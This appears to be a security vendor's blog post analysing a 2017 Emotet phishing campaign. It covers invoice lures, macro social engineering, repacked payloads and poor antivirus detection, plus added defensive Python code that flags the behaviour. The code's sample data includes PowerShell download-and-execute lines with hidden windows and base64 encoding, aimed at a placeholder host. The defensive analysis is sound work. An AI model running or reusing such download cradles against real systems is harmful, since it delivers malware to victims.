Phishing Trojan Campaign Picks Up Pace, Morphing at Scale to Defeat Legacy Detection

Fresh phish

November 13, 2017 | Category: Breaking News, Threats | By: Matthew Rowen


  • Phishing attacks are nothing new, but we are noticing a new trend for polymorphism.
  • Bad guys are wrapping both the document and the dropped executable.
  • In samples that are only minutes old, we see the control server re-obfuscating and updating the malware faster than anti-virus products update their detections.

The changes made to this phishing expedition are more than trivial substitution. As a result, there’s nothing in your perimeter or endpoint AV that’s preventing the malicious document from reaching end users and infecting them. Signature-based tools can only detect malware this fresh after it has already infected a machine.


Here’s one example we saw earlier today. It’s a fairly standard phishing template and, using data stolen by the Trojan from other infected machines, pretends to be from a friend or acquaintance of the recipient. The email encourages the potential victim to click a link to download an alleged invoice.

Phishing template encourages the potential victim to click a link to download an alleged invoice

Upon clicking the link, a document will download. This is what the email led the user to expect, so they will click on it. Here is the malicious document running inside a micro-VM, opened in front of the user who clicked on the phishing link:

Social engineering to trick users into turning macros on if they have been disabled

Again, this is fairly standard, and as we see so often, the malware scarily detonates without any further user interaction once the macros run. As is often the case, there’s some social engineering to trick users into turning macros on if they have been disabled.

Using Bromium Secure Platform, this document has been isolated in a lightweight micro-VM. This is transparent to the user, but our hardware-based isolation allows us to safely continue execution of the malicious code, giving us a unique insight into what it is doing. This analysis is instantly fed back to our customer’s security team.

Here is a view of our analysis of this sample, instantly available via our on-premise console:

A full drill-down into the behaviour is immediately available

A full drill-down into the behavior is immediately available, and in this case we can see the malware migrating between processes (each swim lane is a new process). Along the way, a freshly repacked executable is dropped and executed. This drop-and-execute pattern is very typical of malware, but here the executable has been repacked so recently that the majority of anti-virus products do not yet recognise it.

Ultimately this malware installs a Windows service called “sysservice.exe” which contains the Emotet banking Trojan.
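The drill-down above describes behaviour, not a hash, so it can be written as a detection that does not care what the repacked binary looks like. The following is an added example (not Bromium's code and not the campaign's real trace) that walks a constructed, Sysmon-style event stream and reports the three behaviours the post describes: an Office application migrating into a script host, a freshly written executable being run, and a service registered from a file the same process tree dropped. The event schema, paths and process-name lists are assumptions.

```python
from collections import namedtuple

# Hypothetical minimal record schema: process creation (pid, ppid, image), file creation
# (pid, path) and service installation (pid, image of the registered service).
Event = namedtuple("Event", "kind pid ppid image path", defaults=(None, None, None))
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def analyse(events):
    """Walk the process tree rooted at an Office application and report behaviours that
    survive repacking: script-host spawn, drop-and-execute, and a service installed from
    a file the tree itself wrote. Returns findings in the order they were observed."""
    lineage, written, findings = {}, {}, []   # pid -> [names]; lower path -> writer pid
    for ev in events:
        if ev.kind == "proc":
            name, parent = _basename(ev.image), lineage.get(ev.ppid)
            if parent is None and name not in OFFICE_APPS:
                continue                                    # unrelated process
            lineage[ev.pid] = (parent or []) + [name]
            chain = " > ".join(lineage[ev.pid])
            if parent and name in SCRIPT_HOSTS:
                findings.append(f"script host spawned from Office: {chain}")
            if ev.image.lower() in written:
                findings.append(f"drop-and-execute: pid {written[ev.image.lower()]} wrote "
                                f"{name}, pid {ev.pid} executed it ({chain})")
        elif ev.kind == "file" and ev.pid in lineage:
            written[ev.path.lower()] = ev.pid
        elif ev.kind == "service" and ev.pid in lineage:
            origin = "dropped by the tree" if ev.image.lower() in written else "pre-existing file"
            findings.append(f"service installed by pid {ev.pid}: {_basename(ev.image)} ({origin})")
    return findings

# Constructed telemetry (not the campaign's real trace): Word -> cmd -> PowerShell,
# a fresh executable written and run, then a service registered from a second drop.
SAMPLE_EVENTS = [
    Event("proc", 100, 1, r"C:\Program Files\Microsoft Office\WINWORD.EXE"),
    Event("proc", 200, 100, r"C:\Windows\System32\cmd.exe"),
    Event("proc", 300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Event("file", 300, path=r"C:\Users\u\AppData\Local\Temp\inv_7f2.exe"),
    Event("proc", 400, 300, r"C:\Users\u\AppData\Local\Temp\inv_7f2.exe"),
    Event("file", 400, path=r"C:\Windows\sysservice.exe"),
    Event("service", 400, image=r"C:\Windows\sysservice.exe"),
]
```

Nothing in `analyse` depends on the name or hash of the dropped file, which is the point: a repacked payload produces the same three findings as the previous one.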

Here is what the major AV engines thought of the downloaded document, as reported by VirusTotal at the time it was served. Of course, over time this particular document will be known to more AV tools. But by then, the control server will be serving fresh new versions that are undetected.

Major AV engines mostly missed the Trojan

Similarly, the dropped executable was largely undetected when we saw it: 50 of 66 engines failed to flag it as malicious. This is an interesting development. Polymorphic documents have been seen extensively, but they generally drop binaries that were already known from previous campaigns, so this frequent repacking of the payload itself is an interesting trend.

Ultimately as malware matures, users will be served samples that have been automatically made specifically for them and are totally unknown in the wild – they won’t be stopped at the perimeter or found on the endpoint by legacy tools.

The re-obfuscation is interesting too. The authors have not made simple substitutions (which is all that would be required to defeat a solution relying on signatures) but are making random structural changes in a full re-obfuscation.

This can be seen in the observed PowerShell invocation, which is part of the early process migration:

Observed PowerShell invocation early in the process migration

Compared with a sample delivered from the same URL a few minutes later:

The authors are making random structural changes in a full re-obfuscation
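One defender-side consequence is that detections on the PowerShell stage should match what the invocation does, not how it is spelled. The following is an added example, not the post's or Bromium's code and not the campaign's actual command lines, that canonicalises switch abbreviations, decodes -EncodedCommand, undoes two cheap script obfuscations and then matches behaviour; the two constructed samples differ in nearly every byte a screenshot would show but normalise identically. The switch table and rule set are assumptions, and real re-obfuscation goes further than the two tricks undone here.

```python
import base64
import re
# PowerShell resolves switches by unique prefix; map common abbreviations to one canonical
# name so "-nop -w hidden -enc" and "-NoProfile -WindowStyle Hidden -EncodedCommand" collapse.
_SWITCH = {"nop": "noprofile", "noprofile": "noprofile", "w": "windowstyle",
           "win": "windowstyle", "windowstyle": "windowstyle", "ep": "executionpolicy",
           "exec": "executionpolicy", "executionpolicy": "executionpolicy", "e": "encodedcommand",
           "ec": "encodedcommand", "enc": "encodedcommand", "encodedcommand": "encodedcommand",
           "c": "command", "command": "command"}
_TAKES_VALUE = {"windowstyle", "executionpolicy", "encodedcommand", "command"}
# Script-level behaviours (a hypothetical rule set) matched after light de-obfuscation.
_BEHAVIOURS = {"download": re.compile(r"downloadstring|downloadfile|invoke-webrequest", re.I),
               "eval": re.compile(r"invoke-expression|\biex\b", re.I)}

def encode_command(script):
    """-EncodedCommand carries the script as base64 of its UTF-16LE bytes."""
    return base64.b64encode(script.encode("utf-16-le")).decode()

def canonical_script(script):
    """Undo two cheap obfuscations: backtick escapes inside words and 'a'+'b' string joins."""
    script, prev = script.replace("`", ""), None
    while prev != script:  # repeat until chained 'a'+'b'+'c' joins are fully collapsed
        prev = script
        script = re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", lambda m: f"'{m[1]}{m[2]}'", script)
    return script

def normalise(cmdline):
    """Reduce a powershell.exe command line to features independent of its surface form."""
    toks, flags, script, i = cmdline.split(), set(), "", 1  # toks[0] is the binary itself
    while i < len(toks):
        name, i = _SWITCH.get(toks[i].lstrip("-/").lower()), i + 1
        if name not in _TAKES_VALUE:       # boolean switch, or a token we do not model
            if name:
                flags.add(name)
            continue
        if name == "command":              # -Command swallows the rest of the line
            script = " ".join(toks[i:])
            break
        value, i = (toks[i] if i < len(toks) else ""), i + 1
        if name == "encodedcommand":       # decode the blob instead of signaturing it
            script = base64.b64decode(value).decode("utf-16-le")
        else:
            flags.add(f"{name}={value.lower()}")
    script = canonical_script(script)
    return {"flags": frozenset(flags),
            "behaviours": frozenset(k for k, rx in _BEHAVIOURS.items() if rx.search(script))}

# Constructed samples (not the campaign's real command lines): one behaviour in plain form,
# then reordered/abbreviated switches, a backtick, a split method name and base64 encoding.
SAMPLE_A = ("powershell.exe -NoProfile -WindowStyle Hidden -Command "
            "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/inv')")
SAMPLE_B = "PowerShell -w hidden -nop -enc " + encode_command(
    "I`EX (New-Object Net.WebClient).('Download'+'String')('http://example.invalid/inv')")
```

A rule keyed on `normalise(...)["flags"]` and `["behaviours"]` fires on both samples, whereas a string signature written for one misses the other.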

Bromium users are protected from this campaign, and other zero-day outbreaks, by our unique hardware-based isolation. Our behavioral analysis also allows the malicious activity to be detected even when freshly repacked and re-obfuscated. We provide full forensic information immediately, and because we are able to wait until the malware has actually done something provably bad before creating an alert, we don’t annoy customers with false alarms. Users dependent on legacy AV or signature-based detection may fall victim to this and similar campaigns.

If you want to learn about Bromium Secure Platform, contact us to request a demo.


About the Author

Matthew Rowen
Member of Technical Staff, Engineering at Bromium
